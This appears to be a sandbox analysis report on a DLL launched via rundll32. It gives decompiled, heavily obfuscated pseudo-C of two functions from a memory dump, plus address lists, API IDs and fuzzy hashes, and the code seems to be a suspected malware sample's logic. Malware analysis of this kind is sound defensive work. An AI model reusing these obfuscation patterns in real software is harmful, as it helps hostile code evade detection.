				 *((intOrPtr*)(_t591 + 0x45c)) = E00007FFA7FFA535E23C8(r12d, _t517, _t591, _t568);
				r9d = r15d;
				r8d = 0x1487;
				 *(_t591 + 0x1b8) = 0x535fe190;
				 *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x2a0)) + 0x138)) =  *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x2a0)) + 0x138)) - ( *( *((intOrPtr*)(_t591 + 0x2a0)) + 0x108) ^ 0x00001ba7);
				 *((long long*)(_t593 + 0x40)) = 0x535fc5a0;
				 *((char*)(_t593 + 0x38)) = 0xd3;
				 *((char*)(_t593 + 0x30)) = 0xb3;
				 *((intOrPtr*)(_t593 + 0x28)) =  *((intOrPtr*)(_t591 + 0x340)) - 0x11e9;
				 *(_t593 + 0x20) =  *( *((intOrPtr*)(_t591 + 0x240)) + 0x70) ^ 0x00000f63;
				 *((intOrPtr*)(_t591 + 0x45c)) = E00007FFA7FFA535E23C8(0x11f1, _t517, _t591, _t568);
				_t415 =  *((intOrPtr*)(_t593 + 0xe8)) - _t615 - 0x5c5;
				if (_t415 == 0) goto 0x535faa1f;
				_t595 = _t591;
				_t365 =  *( *((intOrPtr*)(_t591 + 0x240)) + 0x70) + 0xb0daf;
				_t441 = _t365;
				 *(_t591 + 0xe0) = _t365;
				 *(_t591 + 0x1b8) = _t441;
				_t334 = E00007FFA7FFA535E229C(_t517, _t568, _t588, _t591, _t595);
				 *(_t591 + 0xb8) = _t441;
				r9d = 0;
				r10d = 0xb0daf;
				 *(_t591 + 0x460) =  *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x108)) + 0x2a8)) - 0x2114;
				 *((long long*)( *((intOrPtr*)(_t591 + 0x2a0)) + 0x448)) = 0x269c284;
				_t569 =  *((intOrPtr*)(_t591 + 0x108));
				 *(_t591 + 0x190) =  *(_t569 + 0x340) * 0x145c;
				 *((intOrPtr*)(_t591 + 0x310)) =  *((intOrPtr*)(_t591 + 0x310)) - ( *(_t569 + 0x330) ^ 0x00001ec0);
				 *(_t569 + 0x88) =  *(_t569 + 0x88) * ( *((intOrPtr*)(_t591 + 0x4b8)) - 0xc92);
				if (_t415 == 0) goto 0x535fa172;
				r8d = 0;
				r9d = r9d + 1;
				 *(_t595 +  *(_t591 + 0xb8)) =  *( *(_t591 + 0x460) +  *((intOrPtr*)(_t591 + 0x30))) ^  *(_t595 +  *((intOrPtr*)(_t591 + 0x78)));
				 *( *((intOrPtr*)(_t591 + 0x160)) + 0x128) =  *( *((intOrPtr*)(_t591 + 0x160)) + 0x128) |  *((intOrPtr*)(_t591 + 0x358)) + 0x000002e0;
				 *( *((intOrPtr*)(_t591 + 0x20)) + 0x140) =  *( *((intOrPtr*)(_t591 + 0x108)) + 0x230) | _t613;
				 *(_t591 + 0x460) = _t334 %  *(_t591 + 0x60);
				 *(_t591 + 0x130) =  *(_t591 + 0x130) |  *((intOrPtr*)(_t591 + 0x358)) + 0x00000248;
				if (r9d -  *( *((intOrPtr*)(_t591 + 0x2a0)) + 0x70) + _t612 < 0) goto 0x535fa0b8;
				r8d = 0x15fd;
				 *(_t591 + 0x1b8) =  *((intOrPtr*)(_t591 + 0x78));
				E00007FFA7FFA535FAF30(0x1355, _t517, _t616, _t588, _t591, _t591);
				r14d = 0x1ad7;
				_t465 =  *((intOrPtr*)(_t591 + 0x1b0)) + 0x103892;
				 *(_t591 + 0x1b8) = _t465;
				E00007FFA7FFA535E229C(_t517, _t616, _t588, _t591, _t591);
				 *(_t591 + 0x650) = _t465;
				 *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x2a0)) + 0x310)) =  *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x2a0)) + 0x310)) + ( *( *((intOrPtr*)(_t591 + 0x358)) + 0x110) | _t616);
				 *((long long*)( *((intOrPtr*)(_t591 + 0x20)) + 0x320)) =  *((long long*)( *((intOrPtr*)(_t591 + 0x20)) + 0x320)) + 0xfee50c5b;
				_t468 =  *((intOrPtr*)(_t591 + 0x20));
				 *(_t591 + 0x330) =  *(_t591 + 0x330) ^ ( *(_t468 + 0x110) | _t588);
				E00007FFA7FFA535E229C(_t517, _t616, _t588, _t591, _t591);
				 *((long long*)(_t591 + 0x658)) = _t468;
				_t469 =  *((intOrPtr*)(_t591 + 0x358));
				 *(_t591 + 0x1b8) =  *((intOrPtr*)(_t469 + 0x2a8)) + 0x3f507;
				E00007FFA7FFA535E229C(_t517, _t616, _t588, _t591, _t591);
				 *((long long*)(_t591 + 0x660)) = _t469;
				 *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x20)) + 0x418)) =  *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x20)) + 0x418)) + ( *( *((intOrPtr*)(_t591 + 0x160)) + 0x70) | 0x0000145c);
				 *(_t591 + 0x1b8) =  *(_t591 + 0x148) ^ 0x0010a917;
				_t473 =  *((intOrPtr*)(_t591 + 0x110));
				 *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x240)) + 0x398)) =  *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x240)) + 0x398)) - ( *(_t473 + 0x250) ^ _t517);
				E00007FFA7FFA535E229C(_t517,  *((intOrPtr*)(_t591 + 0x240)), _t588, _t591, _t591);
				 *((long long*)(_t591 + 0x668)) = _t473;
				_t474 =  *((intOrPtr*)(_t591 + 0x160));
				_t589 = _t588 -  *((intOrPtr*)(_t474 + 0x110));
				 *((intOrPtr*)(_t591 + 0x170)) =  *((intOrPtr*)(_t591 + 0x170)) + _t588 -  *((intOrPtr*)(_t474 + 0x110));
				 *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x5e8)) + 0x138)) =  *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x5e8)) + 0x138)) +  *( *((intOrPtr*)(_t591 + 0x358)) + 0x110) + 0x651;
				 *(_t591 + 0x1b8) =  *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x2a0)) + 0x148)) + 0x10a0ab;
				_t602 =  *((intOrPtr*)(_t591 + 0x20));
				_t575 =  *((intOrPtr*)(_t591 + 0x240));
				 *(_t591 + 0x130) =  *(_t591 + 0x130) + 0xffffeb79 -  *((intOrPtr*)(_t602 + 0x250));
				 *( *((intOrPtr*)(_t591 + 0x240)) + 0x188) =  *( *((intOrPtr*)(_t591 + 0x240)) + 0x188) |  *(_t602 + 0x248);
				_t480 =  *((intOrPtr*)(_t591 + 0x20));
				 *((long long*)(_t480 + 0x248)) =  *((long long*)(_t480 + 0x248)) - 1;
				E00007FFA7FFA535E229C(_t517,  *((intOrPtr*)(_t591 + 0x240)), _t588 -  *((intOrPtr*)(_t474 + 0x110)), _t591, _t591);
				 *((long long*)(_t591 + 0x680)) = _t480;
				 *( *((intOrPtr*)(_t591 + 0x108)) + 0x248) =  *( *((intOrPtr*)(_t591 + 0x108)) + 0x248) *  *( *((intOrPtr*)(_t591 + 0x108)) + 0x1c8);
				_t483 =  *((intOrPtr*)(_t591 + 0x108));
				 *((long long*)(_t483 + 0x1c8)) =  *((long long*)(_t483 + 0x1c8)) + 1;
				if ( *(_t591 + 0x650) == _t483) goto 0x535fa60b;
				if ( *((intOrPtr*)(_t591 + 0x658)) == _t483) goto 0x535fa60b;
				if ( *((intOrPtr*)(_t591 + 0x660)) == _t483) goto 0x535fa60b;
				if ( *((intOrPtr*)(_t591 + 0x680)) == _t483) goto 0x535fa60b;
				 *(_t591 + 0x300) =  *(_t591 + 0x300) | 0xfffff53b;
				 *((long long*)( *((intOrPtr*)(_t591 + 0x2a0)) + 0x5d8)) =  *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x358)) + 0x5d8)) + _t613;
				 *( *((intOrPtr*)(_t591 + 0x160)) + 0xa8) =  *( *((intOrPtr*)(_t591 + 0x160)) + 0xa8) |  *((intOrPtr*)(_t591 + 0x108)) + 0x00000250;
				 *((intOrPtr*)(_t591 + 0x648)) =  *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x20)) + 0x340)) - 0x11f1;
				 *(_t591 + 0x674) =  *( *((intOrPtr*)(_t591 + 0x5e8)) + 0x2a8) ^ 0x00002114;
				 *((long long*)( *((intOrPtr*)(_t591 + 0x358)) + 0x140)) =  *((intOrPtr*)(_t591 + 0x160)) + 0x50;
				r9d =  *( *((intOrPtr*)(_t591 + 0x2a0)) + 0x70);
				r9d = r9d ^ 0x00001487;
				 *(_t591 + 0x670) = r9d;
				r9d =  *( *((intOrPtr*)(_t591 + 0x240)) + 0x70);
				r9d = r9d - 0x1487;
				 *(_t591 + 0x678) = r9d;
				E00007FFA7FFA535E27D4( *( *((intOrPtr*)(_t591 + 0x5e8)) + 0x2a8) ^ 0x00002114, 0x1355, _t517, _t591,  *((intOrPtr*)(_t591 + 0x240)), _t587, _t588 -  *((intOrPtr*)(_t474 + 0x110)), _t591, _t616, _t615);
				 *(_t591 + 0x1b8) =  *(_t591 + 0xb8);
				r8d = 0x145c;
				 *(_t591 + 0x330) = _t591 + 0x238;
				E00007FFA7FFA535FAF30(0x1fda, _t517, _t575, _t588 -  *((intOrPtr*)(_t474 + 0x110)), _t591, _t591);
				r8d = 0x1355;
				 *( *((intOrPtr*)(_t591 + 0x358)) + 0x298) =  *( *((intOrPtr*)(_t591 + 0x240)) + 0x2f8) * 0x1355;
				 *((long long*)( *((intOrPtr*)(_t591 + 0x108)) + 0x2f8)) = 0xf0cb9d;
				 *( *((intOrPtr*)(_t591 + 0x358)) + 0x338) =  *( *((intOrPtr*)(_t591 + 0x358)) + 0x338) * ( *( *((intOrPtr*)(_t591 + 0x5e8)) + 0xc8) ^ _t517);
				 *(_t591 + 0xb8) =  *((intOrPtr*)(_t591 + 0x680));
				 *(_t591 + 0xe0) =  *(_t591 + 0x678);
				 *( *((intOrPtr*)(_t591 + 0x358)) + 0x38) =  *(_t591 + 0x490) ^ _t615;
				 *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x5e8)) + 0x2d0)) =  *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x5e8)) + 0x2d0)) +  *((intOrPtr*)(_t591 + 0x160)) + 0x470;
				 *(_t591 + 0x1b8) =  *(_t591 + 0x650);
				E00007FFA7FFA535FAF30(r12d, _t517,  *((intOrPtr*)(_t591 + 0x5e8)), _t588 -  *((intOrPtr*)(_t474 + 0x110)), _t591, _t591);
				 *(_t591 + 0x188) =  *(_t591 + 0x188) ^ 0x000017fd;
				r8d = r15d;
				 *( *((intOrPtr*)(_t591 + 0x2a0)) + 0x2f8) =  *( *((intOrPtr*)(_t591 + 0x2a0)) + 0x2f8) * ( *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x108)) + 0x1c0)) + _t517);
				 *( *((intOrPtr*)(_t591 + 0x2a0)) + 0x4b0) =  *( *((intOrPtr*)(_t591 + 0x2a0)) + 0x4b0) ^  *( *((intOrPtr*)(_t591 + 0x20)) + 0x250) * 0x0000181f;
				 *(_t591 + 0x1b8) =  *((intOrPtr*)(_t591 + 0x658));
				E00007FFA7FFA535FAF30(0x2114, _t517,  *( *((intOrPtr*)(_t591 + 0x20)) + 0x250) * 0x181f, _t589, _t591, _t591);
				 *(_t591 + 0x1b8) =  *((intOrPtr*)(_t591 + 0x660));
				goto 0x535faa1f;
				 *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x240)) + 0x88)) =  *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x240)) + 0x88)) +  *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x2a0)) + 0xd8));
				 *((long long*)( *((intOrPtr*)(_t591 + 0x2a0)) + 0xd8)) =  *((long long*)( *((intOrPtr*)(_t591 + 0x2a0)) + 0xd8)) - 1;
				 *( *((intOrPtr*)(_t591 + 0x20)) + 0x398) =  *(_t591 + 0x38) | 0x00001487;
				 *( *((intOrPtr*)(_t591 + 0x20)) + 0x2f8) =  *( *((intOrPtr*)(_t591 + 0x20)) + 0x2f8) |  *((intOrPtr*)(_t591 + 0x358)) + 0x00000420;
				ExitProcess(_t614);
			}



































                0x7ffa535f9c34
                0x7ffa535f9c3a
                0x7ffa535f9c3b
                0x7ffa535f9c3c
                0x7ffa535f9c44
                0x7ffa535f9c4e
                0x7ffa535f9c5e
                0x7ffa535f9c62
                0x7ffa535f9c70
                0x7ffa535f9c7c
                0x7ffa535f9c83
                0x7ffa535f9c8a
                0x7ffa535f9ca4
                0x7ffa535f9cab
                0x7ffa535f9cb2
                0x7ffa535f9cb9
                0x7ffa535f9cbc
                0x7ffa535f9cc7
                0x7ffa535f9cd2
                0x7ffa535f9cdc
                0x7ffa535f9ce3
                0x7ffa535f9cee
                0x7ffa535f9cf8
                0x7ffa535f9d0e
                0x7ffa535f9d19
                0x7ffa535f9d19
                0x7ffa535f9d20
                0x7ffa535f9d2d
                0x7ffa535f9d2d
                0x7ffa535f9d31
                0x7ffa535f9d44
                0x7ffa535f9d4f
                0x7ffa535f9d54
                0x7ffa535f9d59
                0x7ffa535f9d61
                0x7ffa535f9d6d
                0x7ffa535f9d73
                0x7ffa535f9d73
                0x7ffa535f9d79
                0x7ffa535f9d7f
                0x7ffa535f9da3
                0x7ffa535f9dae
                0x7ffa535f9db3
                0x7ffa535f9db8
                0x7ffa535f9dbe
                0x7ffa535f9dca
                0x7ffa535f9dd0
                0x7ffa535f9dd0
                0x7ffa535f9dd6
                0x7ffa535f9dd9
                0x7ffa535f9df3
                0x7ffa535f9dfd
                0x7ffa535f9e11
                0x7ffa535f9e1b
                0x7ffa535f9e23
                0x7ffa535f9e28
                0x7ffa535f9e30
                0x7ffa535f9e39
                0x7ffa535f9e48
                0x7ffa535f9e4e
                0x7ffa535f9e55
                0x7ffa535f9e61
                0x7ffa535f9e66
                0x7ffa535f9e6c
                0x7ffa535f9e7c
                0x7ffa535f9e86
                0x7ffa535f9e8b
                0x7ffa535f9e8f
                0x7ffa535f9e9c
                0x7ffa535f9ea4
                0x7ffa535f9ebf
                0x7ffa535f9eca
                0x7ffa535f9ecf
                0x7ffa535f9ed5
                0x7ffa535f9eda
                0x7ffa535f9edd
                0x7ffa535f9eea
                0x7ffa535f9ef6
                0x7ffa535f9f03
                0x7ffa535f9f09
                0x7ffa535f9f10
                0x7ffa535f9f1a
                0x7ffa535f9f2a
                0x7ffa535f9f35
                0x7ffa535f9f3a
                0x7ffa535f9f3f
                0x7ffa535f9f46
                0x7ffa535f9f53
                0x7ffa535f9f59
                0x7ffa535f9f5e
                0x7ffa535f9f64
                0x7ffa535f9f7f
                0x7ffa535f9fa3
                0x7ffa535f9fae
                0x7ffa535f9fb3
                0x7ffa535f9fb8
                0x7ffa535f9fc1
                0x7ffa535f9fcd
                0x7ffa535f9fda
                0x7ffa535f9fe1
                0x7ffa535f9fee
                0x7ffa535f9ff9
                0x7ffa535f9fff
                0x7ffa535fa002
                0x7ffa535fa00d
                0x7ffa535fa014
                0x7ffa535fa019
                0x7ffa535fa020
                0x7ffa535fa02a
                0x7ffa535fa03c
                0x7ffa535fa049
                0x7ffa535fa054
                0x7ffa535fa074
                0x7ffa535fa088
                0x7ffa535fa09a
                0x7ffa535fa0af
                0x7ffa535fa0b5
                0x7ffa535fa0bf
                0x7ffa535fa0d8
                0x7ffa535fa0f5
                0x7ffa535fa111
                0x7ffa535fa13e
                0x7ffa535fa151
                0x7ffa535fa16c
                0x7ffa535fa176
                0x7ffa535fa17e
                0x7ffa535fa18b
                0x7ffa535fa197
                0x7ffa535fa19d
                0x7ffa535fa1a9
                0x7ffa535fa1b5
                0x7ffa535fa1ba
                0x7ffa535fa1de
                0x7ffa535fa1ec
                0x7ffa535fa1f7
                0x7ffa535fa205
                0x7ffa535fa211
                0x7ffa535fa216
                0x7ffa535fa220
                0x7ffa535fa23a
                0x7ffa535fa243
                0x7ffa535fa248
                0x7ffa535fa268
                0x7ffa535fa27c
                0x7ffa535fa283
                0x7ffa535fa2a0
                0x7ffa535fa2ab
                0x7ffa535fa2b0
                0x7ffa535fa2b7
                0x7ffa535fa2c5
                0x7ffa535fa2cc
                0x7ffa535fa2e8
                0x7ffa535fa30b
                0x7ffa535fa312
                0x7ffa535fa316
                0x7ffa535fa324
                0x7ffa535fa332
                0x7ffa535fa339
                0x7ffa535fa33d
                0x7ffa535fa351
                0x7ffa535fa356
                0x7ffa535fa373
                0x7ffa535fa37a
                0x7ffa535fa381
                0x7ffa535fa391
                0x7ffa535fa39e
                0x7ffa535fa3ab
                0x7ffa535fa3b8
                0x7ffa535fa3be
                0x7ffa535fa3eb
                0x7ffa535fa406
                0x7ffa535fa41d
                0x7ffa535fa432
                0x7ffa535fa44a
                0x7ffa535fa45b
                0x7ffa535fa45f
                0x7ffa535fa466
                0x7ffa535fa474
                0x7ffa535fa478
                0x7ffa535fa47f
                0x7ffa535fa486
                0x7ffa535fa497
                0x7ffa535fa49e
                0x7ffa535fa4b3
                0x7ffa535fa4ba
                0x7ffa535fa4c6
                0x7ffa535fa4de
                0x7ffa535fa4ec
                0x7ffa535fa51d
                0x7ffa535fa52b
                0x7ffa535fa538
                0x7ffa535fa54f
                0x7ffa535fa567
                0x7ffa535fa57a
                0x7ffa535fa581
                0x7ffa535fa586
                0x7ffa535fa5b4
                0x7ffa535fa5b9
                0x7ffa535fa5d6
                0x7ffa535fa5ec
                0x7ffa535fa5f3
                0x7ffa535fa5ff
                0x7ffa535fa606
                0x7ffa535fa625
                0x7ffa535fa633
                0x7ffa535fa649
                0x7ffa535fa661
                0x7ffa535fa668

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: ErrorExitLastProcess
                • String ID: "$l
                • API String ID: 1697593849-1902413641
                • Opcode ID: e2cbf89bb53dce2e131af234cb79d2131a62c9941148f64ecddd86636c798de7
                • Instruction ID: cd5baadae114abc6e4a7196865bad12ebe7b3db0d04e6322fc4eb476dea4534b
                • Opcode Fuzzy Hash: e2cbf89bb53dce2e131af234cb79d2131a62c9941148f64ecddd86636c798de7
                • Instruction Fuzzy Hash: EB721472614BC48AD774CF29D8847E937A9F789B88F44412ADB8D4BB68DF38D254CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535E1488 Relevance: 9.4, APIs: 6, Instructions: 444memoryCOMMONCrypto
                Download Yara Rule
                C-Code - Quality: 69%
                			E00007FFA7FFA535E1488(long long _a8, signed int _a16, signed int _a24, signed int _a32) {
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v104;
				signed int _v112;
				signed int _v120;
				signed int _v128;
				signed int _v136;
				signed int _v144;
				signed int _v152;
				void* _t298;
				signed int _t306;
				void* _t359;
				void* _t410;
				void* _t418;
				intOrPtr _t429;
				long long _t463;
				signed int _t470;
				long long _t485;
				long long _t563;
				long long _t564;
				void* _t566;
				signed int _t568;
				void* _t572;
				void* _t580;
				void* _t583;
				void* _t587;
				void* _t588;
				signed int _t589;

				_a8 = _t485;
				GetProcessHeap();
				r8d = 0x6a0;
				_t298 = HeapAlloc(??, ??, ??);
				r8d = 0x6a0;
				 *0x5367c000 = _t429;
				E00007FFA7FFA535E3F50(_t298, _t359, 0, _t410, _t418, _t429, _t563, _t568);
				_t589 =  *0x5367c000; // 0x0
				r8d = 0x2114;
				r15d = 0x12ad;
				 *(_t589 + 0x160) = _t589;
				 *(_t589 + 0x70) = 0x1487;
				_t4 = _t563 - 0x19; // 0x1294
				r13d = _t4;
				 *(_t589 + 0x20) = _t589;
				_t6 = _t563 - 8; // 0x12a5
				r12d = _t6;
				 *(_t589 + 0x110) = _t589;
				 *(_t589 + 0x240) = _t589;
				 *(_t589 + 0x2a8) = _t568;
				 *((long long*)(_t589 + 0x1b0)) = _t564;
				 *(_t589 + 0x358) = _t589;
				 *(_t589 + 0x148) = 0x1355;
				 *(_t589 + 0x2a0) = _t589;
				 *(_t589 + 0x5e8) = _t589;
				 *((long long*)(_t589 + 0x68)) = _t563;
				 *((long long*)(_t589 + 0x340)) = 0x11f1;
				 *(_t589 + 0x108) = _t589;
				 *((intOrPtr*)(_t589 + 0x630)) = 1;
				_v68 = 0x1ad7;
				_a24 = 0xc92;
				_a16 = 0;
				_v80 = 0;
				_a32 = 0;
				_v88 = r15d;
				_v64 = r8d;
				_v72 = 0x1ba7;
				_v76 = 0x1582;
				_v84 = 0x16ce;
				if (_v84 == _a24 + 0x7f5) goto 0x535e1a2a;
				if (_a32 - _a16 + 0x1ec0 >= 0) goto 0x535e19a8;
				 *((long long*)( *(_t589 + 0x240) + 0x198)) =  *((intOrPtr*)( *(_t589 + 0x160) + 0x2c8));
				 *((long long*)( *(_t589 + 0x160) + 0x2c8)) =  *((long long*)( *(_t589 + 0x160) + 0x2c8)) - 1;
				 *( *(_t589 + 0x20) + 0x140) =  *( *(_t589 + 0x20) + 0x140) +  *((intOrPtr*)( *(_t589 + 0x5e8) + 0x90)) - _t563;
				 *((long long*)(_t589 + 0x30)) = 0x5367c038;
				 *((intOrPtr*)(_t589 + 0x60)) =  *((intOrPtr*)( *(_t589 + 0x5e8) + 0x2a8)) - 0x20e4;
				 *( *(_t589 + 0x110) + 0x490) =  *( *(_t589 + 0x110) + 0x490) |  *( *(_t589 + 0x108) + 0x1a8);
				 *( *(_t589 + 0x108) + 0x1a8) =  *( *(_t589 + 0x108) + 0x1a8) - 1;
				 *((long long*)(_t589 + 0x150)) = 0x5367c008;
				 *( *(_t589 + 0x358) + 0x10) =  *( *(_t589 + 0x358) + 0x10) * ( *((intOrPtr*)( *(_t589 + 0x110) + 0x250)) - _t568);
				 *( *(_t589 + 0x20) + 0x188) =  *( *(_t589 + 0x20) + 0x188) |  *( *(_t589 + 0x358) + 0xa0) * 0x0000181f;
				r8d = _v80;
				r11d = _v76;
				r8d = r8d + r13d;
				r10d = _v88;
				r9d = _v64;
				r9d = r9d - 0xc8d;
				 *((long long*)(_t589 + 0x428)) =  *((intOrPtr*)(_t589 + 0x30));
				r10d = r10d - 0x61b;
				_v120 = _v72 - 0xd0;
				_v128 = _t589;
				_v136 = _a24 + 0x61b;
				_v144 = r9d;
				r9d = _t583 + 0x93e;
				_v152 = r10d;
				_t306 = E00007FFA7FFA535F6898(_v64, _t485 - 0x5cd,  *((intOrPtr*)(_t589 + 0x30)),  *( *(_t589 + 0x358) + 0xa0) * 0x181f,  *(_t589 + 0x20), _t568, _t572);
				r8d = 0x1fda;
				_a24 = _t306;
				 *((intOrPtr*)( *(_t589 + 0x5e8) + 0xb0)) =  *((intOrPtr*)( *(_t589 + 0x5e8) + 0xb0)) - ( *( *(_t589 + 0x20) + 0x320) ^ 0x00000bbb);
				 *((long long*)(_t589 + 0x1b8)) =  *((intOrPtr*)(_t589 + 0x668));
				 *((intOrPtr*)( *(_t589 + 0x108) + 0xc0)) =  *((intOrPtr*)( *(_t589 + 0x108) + 0xc0)) + _t587;
				E00007FFA7FFA535FAF30(0x1ba7, _t485,  *( *(_t589 + 0x20) + 0x320) ^ 0x00000bbb, _t564, _t566, _t589);
				r8d = _a32;
				r8d = r8d + 0x1c76;
				r11d = _v84;
				r10d = _a24;
				r11d = r11d + 0xa46;
				r9d = _v72;
				r10d = r10d - 0x3d9;
				r9d = r9d - 0xaf9;
				_v120 = _a24 + 0xb53;
				_v128 = r9d;
				_v136 = r10d;
				_v144 = r11d;
				_v152 = _v76 - 0x262;
				_v88 = E00007FFA7FFA535F6E94(_v76 - 0x262, _a16 + 0x1582, _v72 - 0x62d, _t485,  *( *(_t589 + 0x358) + 0xa0) * 0x181f,  *( *(_t589 + 0x20) + 0x320) ^ 0x00000bbb, _t568, _t589, _t580);
				 *( *(_t589 + 0x468)) =  *( *(_t589 + 0x160) + 0x1b0) ^ 0x7472768c;
				 *((long long*)( *(_t589 + 0x160) + 0x360)) =  *((intOrPtr*)( *(_t589 + 0x2a0) + 0x3a0)) - _t588;
				 *( *(_t589 + 0x5e8) + 0x418) =  *( *(_t589 + 0x160) + 0x230) | 0x00001515;
				( *(_t589 + 0x468))[1] =  *((intOrPtr*)( *(_t589 + 0x240) + 0x70)) + 0x506c4cee;
				 *((intOrPtr*)( *(_t589 + 0x20) + 0x238)) =  *((intOrPtr*)( *(_t589 + 0x20) + 0x238)) -  *((intOrPtr*)(_t589 + 0x130));
				 *((long long*)(_t589 + 0x130)) =  *((long long*)(_t589 + 0x130)) - 1;
				( *(_t589 + 0x468))[2] =  *(_t589 + 0x148) + 0x65745c1d;
				 *( *(_t589 + 0x2a0) + 0x1c8) =  *( *(_t589 + 0x2a0) + 0xa0) * 0x12ad;
				 *( *(_t589 + 0x160) + 0x5d0) =  *( *(_t589 + 0x160) + 0x5d0) *  *( *(_t589 + 0x2a0) + 0x28);
				r11d = _v84;
				r10d = _a24;
				r11d = r11d - 0xb13;
				r9d = _a16;
				r10d = r10d + 0xa39;
				r9d = r9d + r15d;
				r8d = _v76;
				 *( *(_t589 + 0x2a0) + 0x28) =  *( *(_t589 + 0x2a0) + 0x28) - 1;
				r8d = r8d + 0x14c;
				_v104 = _v68;
				_v112 = r8d;
				_v120 = r9d;
				_v128 = r10d;
				_v136 = r11d;
				_v144 = _v84 - 0x1b9;
				_t161 = _t564 - 0x7f5; // 0x49d
				r9d = _t161;
				_v152 = _v84 - 0x1b9;
				_v88 = E00007FFA7FFA535F84F0(_v76 - 0x391, _v64, _v84 - 0x1b9, _a24, _t418, _t485, _t564, _t589, _t589);
				( *(_t589 + 0x468))[2] =  *((intOrPtr*)( *(_t589 + 0x110) + 0x68)) + 0x6c56e2;
				 *((intOrPtr*)( *(_t589 + 0x240) + 0x4b8)) =  *((intOrPtr*)( *(_t589 + 0x240) + 0x4b8)) + ( *( *(_t589 + 0x20) + 0x140) ^ 0x00001355);
				_t463 =  *(_t589 + 0x240);
				 *( *(_t589 + 0x20) + 0x5d8) =  *( *(_t589 + 0x20) + 0x5d8) ^  *((intOrPtr*)(_t463 + 0x1b0)) + 0x0000145c;
				 *((intOrPtr*)(_t589 + 0x3e8))();
				 *((long long*)(_t589 + 0x498)) = _t463;
				goto 0x535e1a2a;
				 *(_t589 + 0x330) =  *(_t589 + 0x330) ^ _a16 + 0x00001b47;
				_v152 = _v80 *  *(_t589 + 0x2a0);
				CloseHandle(??);
				 *(_t589 + 0x240) =  *(_t589 + 0x240) + ( *(_t589 + 0xb0) & _v84 |  *(_t589 + 0x70));
				if (_v72 - _v76 + 0x5c5 <= 0) goto 0x535e1aae;
				r8d = _v84;
				r8d = r8d - 0x1b9;
				r11d = _v68;
				r10d = _a16;
				r11d = r11d - 0x55d;
				r10d = r10d + 0x11f1;
				_v120 = _v88 + 0x272;
				_v128 = r10d;
				_v136 = r11d;
				_v144 = _a32 + 0x16ce;
				_v152 = _v68 - 0x82a;
				_v84 = E00007FFA7FFA535F8F2C(_a32 + r12d, _t485,  *(_t589 + 0x20), _t564, _t566, _v72 + _v80, _t589);
				_v76 = _v76 + 0xfffffff8;
				goto 0x535e1cee;
				if ( *(_t589 + 0x108) -  *(_t589 + 0x108) -  *((intOrPtr*)(_t589 + 0x310)) < 0) goto 0x535e1c64;
				_t470 = _v68;
				if (_t470 - (_a32 &  *((intOrPtr*)(_t589 + 0x68)) - 0x00001b47) < 0) goto 0x535e1c13;
				_a32 = _v80 ^ _a32 ^ _v84 + _v88;
				 *(_t589 + 0xd8) =  *(_t589 + 0xd8) ^ (_t470 + ( *((intOrPtr*)(_t589 + 0x298)) -  *((intOrPtr*)(_t589 + 0x198)) &  *(_t589 + 0x3a0)) | _v84 *  *(_t589 + 0x3c8) + 0x0000145c) * _v76;
				 *((intOrPtr*)(_t589 + 0x168)) =  *((intOrPtr*)(_t589 + 0x168)) - (_a16 +  *((intOrPtr*)(_t589 + 0x1b0))) * 0x157a;
				r8d =  *(_t589 + 0x140);
				r8d = r8d - 0x145c;
				LeaveCriticalSection(??);
				r15d = r15d - _a16;
				 *(_t589 + 0x88) =  *(_t589 + 0x88) * (_v72 + r15d);
				goto 0x535e1c64;
				r8d = _v72;
				r8d = r8d + _a16;
				r9d = _v88;
				r9d = r9d | _v64 & r12d;
				r10d =  *(_t589 + 0x88);
				r10d = r10d | _v80;
				_v152 = r10d;
				DisconnectNamedPipe(??);
				if (_v68 != ( *(_t589 + 0x108) ^  *(_t589 + 0x2a8))) goto 0x535e1cee;
				if (_v68 == _v68 + (_v80 |  *(_t589 + 0x140))) goto 0x535e1cd5;
				r9d = r9d + 3;
				 *(_t589 + 0xd8) =  *(_t589 + 0xd8) *  *(_t589 + 0x148) *  *(_t589 + 0x3b8);
				if (r9d != _v68 + (_v80 |  *(_t589 + 0x140))) goto 0x535e1c96;
				r8d = r8d + 1;
				if (r8d == ( *(_t589 + 0x108) ^  *(_t589 + 0x2a8))) goto 0x535e1c7b;
				ExitProcess(??);
			}




































                0x7ffa535e1488
                0x7ffa535e14a2
                0x7ffa535e14b2
                0x7ffa535e14b5
                0x7ffa535e14bb
                0x7ffa535e14c3
                0x7ffa535e14ca
                0x7ffa535e14cf
                0x7ffa535e14dd
